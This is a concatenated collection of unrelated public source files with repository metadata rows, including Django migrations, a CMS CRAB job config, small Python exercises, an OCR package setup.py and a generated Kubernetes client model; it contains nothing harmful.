                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_of_birth', models.DateField(blank=True, null=True)),
                # Uploaded photos are bucketed by date under MEDIA_ROOT/users/.
                ('photo', models.ImageField(blank=True, upload_to='users/%Y/%m/%d/')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"raimbaev.223@gmail.com"
] | raimbaev.223@gmail.com |
0765de0d02b8ed5de3c97d6966c417566f8a965b | 11bb0cbe6de2a0a4e94fc0ba610f61894d5593a1 | /VBS_Zgamma/RunII2018/Ntuples_2018/PKUTreeMaker/test/Zcrab/crab3_analysisZA.py | 6048c5a01d4c8023c1caecfb688a9c6e01a15f5d | [] | no_license | AnYpku/PKU-Cluster | 0dc4a88445aeb3ca239b2d7d7f796c6a67f3f69c | f9ffbcb7988053f4618fd015c1bb656d92ff51c6 | refs/heads/master | 2022-11-01T23:46:59.442037 | 2022-10-21T06:37:43 | 2022-10-21T06:37:43 | 188,202,345 | 0 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,183 | py | from WMCore.Configuration import Configuration
# CRAB3 job configuration for the PKUTreeMaker Z analysis over the 2018
# ZGToLLG MC sample; output is staged to the T3_US_FNALLPC site.
config = Configuration()
config.section_("General")
config.General.requestName = 'Z-ZA_smearing'
config.General.transferLogs = True
config.section_("JobType")
config.JobType.pluginName = 'Analysis'
# Autumn18 V8 MC jet-energy-correction text files shipped with every job
# (CHS and Puppi collections, L1FastJet/L2Relative/L3Absolute levels).
config.JobType.inputFiles = ['Autumn18_V8_MC_L1FastJet_AK4PFchs.txt','Autumn18_V8_MC_L2Relative_AK4PFchs.txt','Autumn18_V8_MC_L3Absolute_AK4PFchs.txt','Autumn18_V8_MC_L1FastJet_AK4PFPuppi.txt','Autumn18_V8_MC_L2Relative_AK4PFPuppi.txt','Autumn18_V8_MC_L3Absolute_AK4PFPuppi.txt']
# Name of the CMSSW configuration file
config.JobType.psetName = 'Zanalysis.py'
config.JobType.allowUndistributedCMSSW = True
config.section_("Data")
config.Data.inputDataset = '/ZGToLLG_01J_5f_TuneCP5_13TeV-amcatnloFXFX-pythia8/RunIIAutumn18MiniAOD-102X_upgrade2018_realistic_v15_ext1-v2/MINIAODSIM'
config.Data.allowNonValidInputDataset = True
config.Data.inputDBS = 'global'
# One input file per job; totalUnits = -1 processes the whole dataset.
config.Data.splitting = 'FileBased'
config.Data.unitsPerJob = 1
config.Data.totalUnits = -1
config.Data.publication = False
config.Data.outputDatasetTag = 'Z-ZA'
config.section_("Site")
#config.Site.storageSite = 'T2_CN_Beijing'
config.Site.storageSite = 'T3_US_FNALLPC'
| [
"ying.an@cern.ch"
] | ying.an@cern.ch |
be2c6b067ca851d5e4016d68def182a7dd5a0109 | 83b67a0800ceb5d5828c8e2011ff31b5faa311f8 | /experiments/save_exp.py | 47f9c2c3deb37a6f84566cdb9566403e8279cbbc | [] | no_license | xKHUNx/scatnet_learn | 77d89da4025f9c3cdbe74c957cf2a3e8626e3a01 | 9b2efbc9764118b58146950320215d33b6dc3240 | refs/heads/master | 2022-03-29T18:42:49.644481 | 2020-01-15T13:17:21 | 2020-01-15T13:17:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # Fergal Cotter
#
# Future modules
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import time
import git
import shutil
TEMPLATE = """Invariant Layer Experiment
==========================
This experiment was run on {day} at {time}.
The command used to run the program was:
.. code::
{runcmd}
The repo commit used at running this command was::
{githash}
The numpy/pytorch random seed was::
{seed}
The number of learnable parameters is::
{num_params}
Description
-----------
"""
ACC_TEMPLATE = """
Best Result
-----------
The best acc was {best:.3f} and the last acc was {last:.3f}
"""
FOLD_TEMPLATE = """
Fold {k}: {best:.3f}"""
def get_githash(module):
    """Best-effort HEAD commit hash of the git repo containing *module*,
    or '?' when the module does not live inside a repository."""
    try:
        repo = git.Repo(module.__file__, search_parent_directories=True)
        return str(repo.git.rev_parse('HEAD'))
    except git.InvalidGitRepositoryError:
        return "?"
def break_run_cmd(params):
    """Render *params* (argv-style list) as a 'python <file> <args>' string
    with the arguments joined by ' \\n ' so long commands wrap."""
    script = params[0]
    joined_args = ' \n '.join(params[1:])
    return 'python {} {}'.format(script, joined_args)
def get_num_params(net):
    """Human-readable count of trainable parameters in *net*.

    Returns '?' when no network is given; otherwise a string such as
    '12.34k' or '1.234M', with precision depending on the magnitude.
    """
    if net is None:
        return '?'
    n = sum(p.numel() for p in net.parameters() if p.requires_grad)
    if n < 1e5:
        return '{:.2f}k'.format(n / 1e3)
    if n < 1e6:
        return '{:.3f}M'.format(n / 1e6)
    if n < 1e7:
        return '{:.2f}M'.format(n / 1e6)
    return '{:.1f}M'.format(n / 1e6)
def save_experiment_info(outdir, seed, no_comment=False, net=None):
    """ Creates an experiment info file in the output directory
    Args:
        outdir: the output directory
        seed: the numpy/pytorch random seed recorded in the file
        no_comment: skip the interactive vim description step when True
        net: the network object (used only for the parameter count)
    Returns:
        None
    """
    file = os.path.join(outdir, 'INFO.rst')
    with open(file, 'w') as f:
        f.write(TEMPLATE.format(
            day=time.strftime('%Y/%m/%d'),
            time=time.strftime("%H-%M-%S", time.gmtime(time.time())),
            runcmd='python {}'.format(' '.join(sys.argv)),
            githash="?",
            seed=seed,
            num_params=get_num_params(net)
        ))
    # Open vim so the user can type a free-form description, except for
    # debug runs or when explicitly disabled.
    if 'debug' not in outdir and not no_comment:
        os.system('vim + {file}'.format(file=file))
    print('Saved info file. Copying source')
    # Snapshot the source tree (.py files only) next to the results.
    copytree(os.path.join(os.path.dirname(__file__), '..'), outdir)
def copytree(src, dst):
    """Recursively copy the .py files from src into dst, creating missing
    directories and never overwriting files that already exist."""
    for entry in os.listdir(src):
        src_entry = os.path.join(src, entry)
        dst_entry = os.path.join(dst, entry)
        if os.path.isdir(src_entry):
            if not os.path.isdir(dst_entry):
                os.mkdir(dst_entry)
            copytree(src_entry, dst_entry)
        elif os.path.splitext(src_entry)[1] == '.py' and not os.path.exists(dst_entry):
            shutil.copy2(src_entry, dst_entry)
def save_acc(outdir, best, last):
    """Append the best/last accuracy summary to outdir's INFO.rst, doing
    nothing when the info file has not been created."""
    info_path = os.path.join(outdir, 'INFO.rst')
    if not os.path.exists(info_path):
        return
    with open(info_path, 'a') as handle:
        handle.write(ACC_TEMPLATE.format(best=best, last=last))
def save_kfoldacc(outdir, fold, r2):
    """Append one k-fold result line to outdir's INFO.rst (if present),
    writing the section header before the first fold."""
    info_path = os.path.join(outdir, 'INFO.rst')
    if not os.path.exists(info_path):
        return
    with open(info_path, 'a') as handle:
        if fold == 0:
            handle.write("\nKFOLD Results\n-------------")
        handle.write(FOLD_TEMPLATE.format(k=fold, best=r2))
| [
"fbcotter90@gmail.com"
] | fbcotter90@gmail.com |
6a1a1757829d687a4e590ec2ef37f100293e8521 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/380/usersdata/346/73642/submittedfiles/testes.py | 6e915ea2557ba3f2e24c9794f73162d52521c19f | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | n= int(input('Digite quantos lados deve ter o seu polígono: '))
# A convex polygon with n sides has n*(n-3)/2 diagonals.
nd= (n*(n-3))/2
print('%.1f' % nd)
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
de06d49e0d61870db7688cf2ef395cb2ffcc3935 | 81026fb32d5fe66e291c824f8bb8e251d6ce56d5 | /04 Functions/using_math.py | 32fbfddf7efc078860cced164909527f9c0badc5 | [] | no_license | rifqirosyidi/coding-python | b1e148d1787d741cdc0ce2c36dd13ff6b8d2c17b | 0d98d55d0aaf2cca4129f1b98365a5866eb28dd2 | refs/heads/master | 2020-08-11T12:51:57.567318 | 2019-10-29T15:38:14 | 2019-10-29T15:38:14 | 214,567,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,007 | py | import math
def get_luas_bidang(value):
    """Dispatch to the area routine matching the (case-insensitive) shape
    name; prints a notice for unsupported shapes."""
    handlers = {
        "segitiga": bidang_segitiga,
        "segiempat": bidang_segiempat,
        "lingkaran": bidang_lingkaran,
    }
    handler = handlers.get(value.lower())
    if handler is None:
        print("Hanya Menangani Segitiga, Lingkaran dan Segiempat")
    else:
        handler()
def bidang_segitiga():
    """Prompt for base and height, then print the triangle area."""
    base = float(input("Masukkan Alas : "))
    height = float(input("Masukkan Tinggi : "))
    print("Luas Segi Tiga : ", (0.5 * base) * height)
def bidang_segiempat():
    """Prompt for width and length, then print the rectangle area."""
    width = float(input("Masukkan Lebar : "))
    length = float(input("Masukkan Panjang : "))
    print("Luas Segi Empat : ", length * width)
def bidang_lingkaran():
    """Prompt for a radius, then print the circle area to two decimals."""
    radius = float(input("Masukkan Jari Jari Lingkaran : "))
    print("Luas Lingkaran : ", round(math.pi * math.pow(radius, 2), 2))
def main():
    # Entry point: ask which shape to compute, then dispatch on the answer.
    bentuk_bidang = input("Masukkan Bidang Apa Yang Ingin di Hitung : ")
    get_luas_bidang(bentuk_bidang)
main() | [
"rief.rosyidi@gmail.com"
] | rief.rosyidi@gmail.com |
0792882963b6c69117dab0d94d597d48eff39ae2 | be9e32a9182d16fe92d937f5965a2a3a3ec11dc8 | /bundler.py | b6d11c6deacf7a9dd8756f4b1a0058978e5e60df | [
"ISC"
] | permissive | theexiled1/CageTheUnicorn | 1a649f974298109d68e4af3401976855ddf98c83 | e695a2d9660eed3bdde4909f755c52d66beef7da | refs/heads/master | 2020-12-03T11:59:29.995881 | 2017-08-21T16:43:20 | 2017-08-21T16:43:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | import struct, sys
from glob import glob
def main(dumpdir, mainaddr, wkcaddr):
mainaddr = int(mainaddr.replace('0x', ''), 16)
wkcaddr = int(wkcaddr.replace('0x', ''), 16)
with file('membundle.bin', 'wb') as fp:
files = glob('%s/*.bin' % dumpdir)
fp.write(struct.pack('<IQQ', len(files), mainaddr, wkcaddr))
for fn in files:
addr = int(fn[11:].rsplit('/', 1)[-1].split(' ', 1)[0], 16)
end = int(fn[11:].rsplit('/', 1)[-1].split(' - ')[1], 16)
data = file(fn, 'rb').read()
print '%x size %x -- real %x' % (addr, end - addr, len(data))
if end - addr != len(data):
print 'MISMATCHED SIZE! CORRUPT DUMP'
raw_input()
fp.write(struct.pack('<QI', addr, len(data)))
fp.write(data)
# Usage: python bundler.py <dumpdir> <mainaddr> <wkcaddr>
if __name__=='__main__':
	main(*sys.argv[1:])
| [
"cody.brocious@gmail.com"
] | cody.brocious@gmail.com |
8a555b206e436193b34566826633625c548602f5 | 4cdf99ed3fd91f2406fe908fff77284fbc2cd3c3 | /setup.py | 2c5bf3aad0abc71d2d5317b265460620b0199da7 | [
"MIT"
] | permissive | shinroo/mocr | cb4173d22413b9ba7e140118832e9ce6aac2da09 | 5d33a812172b87d126bf3f7de0238b0919c2ab86 | refs/heads/master | 2020-04-12T00:34:45.462919 | 2018-12-09T20:50:00 | 2018-12-09T20:50:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import os
import re
import codecs
from setuptools import setup, find_packages
# Absolute path of the directory holding this setup.py; file reads below
# are resolved against it.
cwd = os.path.abspath(os.path.dirname(__file__))
def read(filename):
    """Return the UTF-8 decoded contents of *filename*, resolved against
    the directory containing this setup.py."""
    full_path = os.path.join(cwd, filename)
    with codecs.open(full_path, 'rb', 'utf-8') as handle:
        return handle.read()
# Raw text of mocr/__init__.py; dunder metadata is parsed out of it below.
metadata = read(os.path.join(cwd, 'mocr', '__init__.py'))
def extract_metaitem(meta):
    """Pull one dunder metadata value (e.g. meta='version' reads
    __version__) out of the mocr/__init__.py text; raise when absent."""
    pattern = r"""^__{meta}__\s+=\s+['\"]([^'\"]*)['\"]""".format(meta=meta)
    match = re.search(pattern, metadata, re.MULTILINE)
    if match is None:
        raise RuntimeError('Unable to find __{meta}__ string.'.format(meta=meta))
    return match.group(1)
# All package metadata below is single-sourced from the dunders in
# mocr/__init__.py via extract_metaitem().
setup(
    name='mocr',
    version=extract_metaitem('version'),
    license=extract_metaitem('license'),
    description=extract_metaitem('description'),
    long_description=(read('README.rst')),
    author=extract_metaitem('author'),
    author_email=extract_metaitem('email'),
    maintainer=extract_metaitem('author'),
    maintainer_email=extract_metaitem('email'),
    url=extract_metaitem('url'),
    download_url=extract_metaitem('download_url'),
    packages=find_packages(exclude=('tests', 'docs')),
    include_package_data=True,
    platforms=['Any'],
    install_requires=['opencv-python', 'opencv-contrib-python', 'pillow', 'pytesseract', 'imutils', 'numpy'],
    setup_requires=['pytest-runner'],
    tests_require=['pytest'],
    keywords='ocr, optical character recognition, identity card, deep learning, opencv, meaningful',
    classifiers=[
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
    ],
    )
| [
"abdullahselek@gmail.com"
] | abdullahselek@gmail.com |
d2698bcccc58c5147cae9d2d59f3b99c7942463e | f7ed942c685bd0e77eb207b901ccae78b1844cfc | /three_sum.py | 4b5d927f83a2e27455519b1b6deaceb43c3a115e | [] | no_license | axu4github/leetcode.answers | beeeec30e2958a9fb5727fe1f77e5e919655becc | d2dd4a211a2c380f9816e0454c1a8c817545c1d7 | refs/heads/master | 2020-03-27T07:15:46.179010 | 2020-01-08T13:29:21 | 2020-01-08T13:29:21 | 146,176,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,538 | py | # coding=utf-8
class Solution(object):
    """
    15. 3Sum
    (https://leetcode-cn.com/problems/3sum/description/)

    Given an array nums of n integers, find all unique triplets
    [a, b, c] in nums with a + b + c == 0.  The answer must not
    contain duplicate triplets.

    Example: nums = [-1, 0, 1, 2, -1, -4] ->
    [
        [-1, 0, 1],
        [-1, -1, 2]
    ]
    """

    def two_sum(self, nums, target):
        """Return every pair [a, b] from nums with a + b == target.

        Single pass over nums with a seen-value hash map: each element is
        matched against complements recorded earlier in the scan.
        """
        pairs, seen = [], {}
        for i, value in enumerate(nums):
            complement = target - value
            if complement in seen:
                pairs.append([value, complement])
            else:
                seen[value] = i
        return pairs

    def threeSum(self, nums):
        """
        :type nums: List[int]
        :rtype: List[List[int]]
        """
        unique, processed, nums = {}, {}, sorted(nums)
        for i, num in enumerate(nums):
            # After sorting, a positive pivot can never open a zero-sum
            # triplet; also skip pivots that were already expanded.
            if num > 0 or num in processed:
                continue
            pairs = self.two_sum(nums[i + 1:], -num)
            if pairs:
                processed[num] = None
            for pair in pairs:
                triplet = tuple(sorted(pair + [num]))
                # Dict keys deduplicate triplets while keeping insertion order.
                if triplet not in unique:
                    unique[triplet] = None
        # Materialize as lists: the original returned a lazy `map` object,
        # which on Python 3 is not the List[List[int]] the contract promises.
        return [list(triplet) for triplet in unique]
| [
"axu.home@gmail.com"
] | axu.home@gmail.com |
ee3d1185c32a04865b9ad8088059e235a5492772 | eee5fc5e9e1bd9ababc9cf8ccb8add19c9219ca3 | /ABC/151/d_bfs.py | 21951db67400789ba2fc6f7fa0e087d70d5afb84 | [] | no_license | matatabinoneko/Atcoder | 31aa0114bde28ab1cf528feb86d1e70d54622d84 | 07cc54894b5bcf9bcb43e57a67f2a0cbb2714867 | refs/heads/master | 2021-11-13T04:39:13.824438 | 2021-10-31T01:42:52 | 2021-10-31T01:42:52 | 196,823,857 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,664 | py | import queue
import copy
def main():
    # ABC151 D: report the maximum, over all start cells, of the BFS
    # shortest-path distance to the farthest reachable '.' cell
    # (the maze's diameter).
    h,w = map(int,input().split())
    maze = []
    # Pad the grid with a '#' border so neighbour checks need no bounds tests.
    maze.append(['#' for i in range(w+2)])
    for i in range(h):
        tmp = input()
        tmp = list('#' + tmp + '#')
        maze.append(tmp)
    maze.append(['#' for i in range(w+2)])
    # print(maze)
    # Right/down/left/up neighbour offsets, consumed pairwise via zip below.
    dx_ = [0,1,0,-1]
    dy_ = [1,0,-1,0]
    ans = -1
    q = queue.Queue()
    # Run one BFS from every open cell; dis is -1 while a cell is unvisited.
    for i in range(1,h+1):
        for j in range(1,w+1):
            new_maze = copy.deepcopy(maze)
            dis = [[-1 for a in range(w+2)]for b in range(h+2)]
            # for a in range(1,h):
            #     for b in range(1,w):
            #         dis[a][b] = -1
            if new_maze[i][j]=='.':
                dis[i][j]=0
                q.put([i,j])
                max_dis = -1
                while(not q.empty()):
                    [x,y] = q.get()
                    new_maze[x][y]='#'
                    # print(x,y)
                    if max_dis < dis[x][y]:
                        max_dis = dis[x][y]
                    for dx,dy in zip(dx_,dy_):
                        # print(x+dx,y+dy)
                        if dis[x+dx][y+dy] == -1 and new_maze[x+dx][y+dy] != '#':
                            # new_maze[x+dx][y+dy] = '#'
                            dis[x+dx][y+dy] = dis[x][y]+1
                            q.put([x+dx,y+dy])
                            # print("put",x+dx,y+dy)
                # for i in range(len(maze)):
                #     print(maze[i])
                # print()
                # print("max is",max_dis)
                if ans < max_dis:
                    ans = max_dis
    print(ans)
    return 0
# Run only when executed as a script (reads the grid from stdin).
if __name__ == "__main__":
    main()
"matatabinoneko0721@gmail.com"
] | matatabinoneko0721@gmail.com |
ae82513226f91ab38fa6ae76d5f8bc57af2d9873 | 6e47be4e22ab76a8ddd7e18c89f5dc4f18539744 | /venv/openshift/lib/python3.6/site-packages/kubernetes/client/models/v1_aws_elastic_block_store_volume_source.py | ef20d19c36e713bc035972b2b71b0b4bad61a1a5 | [] | no_license | georgi-mobi/redhat_ocp4.5_training | 21236bb19d04a469c95a8f135188d3d1ae473764 | 2ccaa90e40dbbf8a18f668a5a7b0d5bfaa1db225 | refs/heads/main | 2023-03-30T10:47:08.687074 | 2021-04-01T05:25:49 | 2021-04-01T05:25:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,378 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.12.11
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1AWSElasticBlockStoreVolumeSource(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'fs_type': 'str',
        'partition': 'int',
        'read_only': 'bool',
        'volume_id': 'str'
    }
    attribute_map = {
        'fs_type': 'fsType',
        'partition': 'partition',
        'read_only': 'readOnly',
        'volume_id': 'volumeID'
    }
    def __init__(self, fs_type=None, partition=None, read_only=None, volume_id=None):
        """
        V1AWSElasticBlockStoreVolumeSource - a model defined in Swagger
        """
        self._fs_type = None
        self._partition = None
        self._read_only = None
        self._volume_id = None
        self.discriminator = None
        if fs_type is not None:
          self.fs_type = fs_type
        if partition is not None:
          self.partition = partition
        if read_only is not None:
          self.read_only = read_only
        # volume_id is the only required field: it is assigned
        # unconditionally and its setter rejects None.
        self.volume_id = volume_id
    @property
    def fs_type(self):
        """
        Gets the fs_type of this V1AWSElasticBlockStoreVolumeSource.
        Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
        :return: The fs_type of this V1AWSElasticBlockStoreVolumeSource.
        :rtype: str
        """
        return self._fs_type
    @fs_type.setter
    def fs_type(self, fs_type):
        """
        Sets the fs_type of this V1AWSElasticBlockStoreVolumeSource.
        Filesystem type of the volume that you want to mount. Tip: Ensure that the filesystem type is supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
        :param fs_type: The fs_type of this V1AWSElasticBlockStoreVolumeSource.
        :type: str
        """
        self._fs_type = fs_type
    @property
    def partition(self):
        """
        Gets the partition of this V1AWSElasticBlockStoreVolumeSource.
        The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as \"1\". Similarly, the volume partition for /dev/sda is \"0\" (or you can leave the property empty).
        :return: The partition of this V1AWSElasticBlockStoreVolumeSource.
        :rtype: int
        """
        return self._partition
    @partition.setter
    def partition(self, partition):
        """
        Sets the partition of this V1AWSElasticBlockStoreVolumeSource.
        The partition in the volume that you want to mount. If omitted, the default is to mount by volume name. Examples: For volume /dev/sda1, you specify the partition as \"1\". Similarly, the volume partition for /dev/sda is \"0\" (or you can leave the property empty).
        :param partition: The partition of this V1AWSElasticBlockStoreVolumeSource.
        :type: int
        """
        self._partition = partition
    @property
    def read_only(self):
        """
        Gets the read_only of this V1AWSElasticBlockStoreVolumeSource.
        Specify \"true\" to force and set the ReadOnly property in VolumeMounts to \"true\". If omitted, the default is \"false\". More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
        :return: The read_only of this V1AWSElasticBlockStoreVolumeSource.
        :rtype: bool
        """
        return self._read_only
    @read_only.setter
    def read_only(self, read_only):
        """
        Sets the read_only of this V1AWSElasticBlockStoreVolumeSource.
        Specify \"true\" to force and set the ReadOnly property in VolumeMounts to \"true\". If omitted, the default is \"false\". More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
        :param read_only: The read_only of this V1AWSElasticBlockStoreVolumeSource.
        :type: bool
        """
        self._read_only = read_only
    @property
    def volume_id(self):
        """
        Gets the volume_id of this V1AWSElasticBlockStoreVolumeSource.
        Unique ID of the persistent disk resource in AWS (Amazon EBS volume). More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
        :return: The volume_id of this V1AWSElasticBlockStoreVolumeSource.
        :rtype: str
        """
        return self._volume_id
    @volume_id.setter
    def volume_id(self, volume_id):
        """
        Sets the volume_id of this V1AWSElasticBlockStoreVolumeSource.
        Unique ID of the persistent disk resource in AWS (Amazon EBS volume). More info: https://kubernetes.io/docs/concepts/storage/volumes#awselasticblockstore
        :param volume_id: The volume_id of this V1AWSElasticBlockStoreVolumeSource.
        :type: str
        """
        if volume_id is None:
            raise ValueError("Invalid value for `volume_id`, must not be `None`")
        self._volume_id = volume_id
    # --- generic swagger-model plumbing (serialisation/comparison) below ---
    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())
    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()
    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, V1AWSElasticBlockStoreVolumeSource):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| [
"student@workstation.lab.example.com"
] | student@workstation.lab.example.com |
262e68b1e377d555f99bc12cfb6bb2eb9023cf5a | 47d1beba77ebde115c5d41b25a15ef144068c930 | /findingaids/migrations/0019_auto_20161103_1604.py | b73f511547de16968764b57cb516bd6fc376f20a | [] | no_license | uchicago-library/library_website | f32d7dcaf793b4646cac37ba7270715dccf84820 | e5912a17ed2de3a61ede2fbebda4a258664ff696 | refs/heads/master | 2023-08-16T20:20:45.063253 | 2023-08-10T21:19:12 | 2023-08-10T21:19:12 | 39,917,251 | 5 | 4 | null | 2023-08-10T21:19:14 | 2015-07-29T21:27:58 | Python | UTF-8 | Python | false | false | 16,916 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-11-03 21:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # All three AlterField operations below previously inlined the identical
    # frozen list of (StaffPage id, display name) choices three times; it is
    # defined once here instead.  ``choices`` on a ForeignKey is enforced only
    # at the form/validation layer and has no effect on the database schema,
    # so sharing one list does not change what this migration does.
    STAFF_PAGE_CHOICES = [
        (44, 'Ricardo R Andrade'), (125, 'Jeffry D. Archer'), (85, 'Dean W. Armstrong'), (51, 'Dale Arntson'),
        (149, 'Kathleen Arthur'), (184, 'Melina Avery'), (1883, 'Shauna Babcock'), (54, 'Brian Balsamo'),
        (247, 'Terry Banks'), (55, 'Timothy Barnaby'), (177, 'Michelle B Bass'), (167, 'Linda Beezhold'),
        (205, 'Paul Belloni'), (82, 'David Bietila'), (71, 'Charles Blair'), (4906, 'Emma Boettcher'),
        (226, 'Steven Boozer'), (90, 'David Borycz'), (83, 'David W. Bottorff'), (225, 'Samuel B Brown'),
        (182, 'Michael D. Brown'), (99, 'Ellen Bryan'), (43, 'Amy M Buckland'), (211, 'Vicki Burwell-Rankin'),
        (56, 'Bradley Busenius'), (65, 'Maura Byrne'), (227, 'Sherry Byrne'), (134, 'John Carey'),
        (248, 'Timothy Clark'), (180, 'Miranda Clower'), (241, 'Steve Coats'), (66, 'Christine Colburn'),
        (102, 'Evelyn Collier'), (76, 'Kevin A Collier'), (77, 'James Collins'), (78, 'Christopher Cronin'),
        (250, 'Theodore Cueller'), (249, 'Tyler Danstrom'), (213, 'Renee Darosky'), (126, 'Judith Dartt'),
        (84, 'Dora Davis'), (235, 'Subrata De'), (86, 'Will Degenhard'), (228, 'Sean Dempsey'),
        (178, 'Melanie Dial'), (254, 'Thomas Dousa'), (255, 'Thomas Drueke'), (4835, 'Jennifer Dunlap'),
        (214, 'Ronald Durham'), (96, 'Elizabeth Edwards'), (68, 'Charles Ellington'), (186, 'Michael C Evans'),
        (201, 'Octavia Fallwell'), (88, 'David Farley'), (140, 'June P. Farris'), (152, 'Kathleen Feeney'),
        (69, 'Lily Fieg'), (229, 'Sean Filipov'), (179, 'M. Constance Fleischer'), (107, 'Greg Fleming'),
        (172, 'Lynn Franco'), (2469, 'David H Frankel'), (4815, 'Jennifer Frary'), (212, 'Raymond Gadke'),
        (148, 'Julia Gardner'), (252, 'Timothy Garrison'), (111, 'Joseph Gerdeman'), (204, 'Patti Gibbons'),
        (58, 'Barbara Gilbert'), (103, 'Fabian Gonzalez'), (52, 'Ashley Locke Gosselar'), (132, 'Jaymes B Grider'),
        (116, 'Gerald Hall'), (142, 'Jamal Hamilton'), (79, 'Catherine Hardy'), (232, 'Susan Harkins'),
        (89, 'Diana Rose Harper'), (118, 'Jamaar Harris'), (119, 'Jennifer Hart'), (166, 'Laurie Haugland'),
        (154, 'Kiku Hibino'), (4878, 'Taylor Hixson'), (110, 'Geraldine Hogue'), (98, 'Eileen Ielmini'),
        (253, 'Todd Ito'), (61, 'Brenda Johnson'), (70, 'Charlotte Jones'), (129, 'John Jung'),
        (135, 'John Kaderbek'), (4816, 'Kera Kelly'), (187, 'Mark Kennel'), (191, 'Michael Kenny'),
        (59, 'Barbara Kern'), (123, 'Hyerye Kim'), (131, 'Jenny Kim'), (42, 'Anne Knafl'),
        (207, 'Priya Kuppuraju'), (120, 'Hannah Landsman'), (236, 'Scott Landvatter'), (164, 'David K. Larsen'),
        (137, 'Jackie Larson'), (267, 'Simon Lee'), (39, 'Andrew D Lee'), (237, 'Sandra Levy'),
        (192, 'Melanie Levy'), (234, 'Sheri Lewis'), (46, 'Ann Lindsey'), (121, 'Holly Lipschultz'),
        (100, 'Elisabeth Long'), (168, 'Lyonette Louis-Jacques'), (41, 'Andrew John Lovdahl'), (57, 'Benita Luke'),
        (108, 'Grace Lyons'), (73, 'Cheryl Malmborg'), (113, 'Gary Mamlin'), (174, 'Amy Mantrone'),
        (74, 'Clint Marcy'), (175, 'Catherine M. Mardikes'), (158, 'Kristin E Martin'), (4967, 'Susan Martin'),
        (217, 'Renee Martonik'), (169, 'Janet L Mather'), (4834, 'Anita Marie Mechler'), (200, 'Edd Merkel'),
        (185, 'Stacey Metralexis'), (50, 'Daniel Meyer'), (130, 'Jon Miller'), (266, 'Yuan Mo'),
        (159, 'Kiya Moody'), (242, 'Steven Moore'), (189, 'James Mouw'), (75, 'Colleen Mullarkey'),
        (97, 'Erica Myles'), (269, 'Youli Na'), (62, 'Brittan Nannenga'), (219, 'Rose Navarro'),
        (2764, 'Olaf Nelson'), (87, 'Daryl Nelson'), (60, 'Benjamin Niespodziany'), (114, 'Greg Nimmo'),
        (139, 'James Nye'), (47, 'Adrianne Okoh'), (256, 'Tod Olson'), (265, 'Yasmin Omer'),
        (221, 'Ru Orb'), (48, 'Anderson Orsburn'), (196, 'Natascha Owens'), (128, 'Jee-Young Park'),
        (4833, 'Arnisha Parker'), (115, 'Gail Parks'), (124, 'James Anthony Patterson'), (243, 'Scott Perry'),
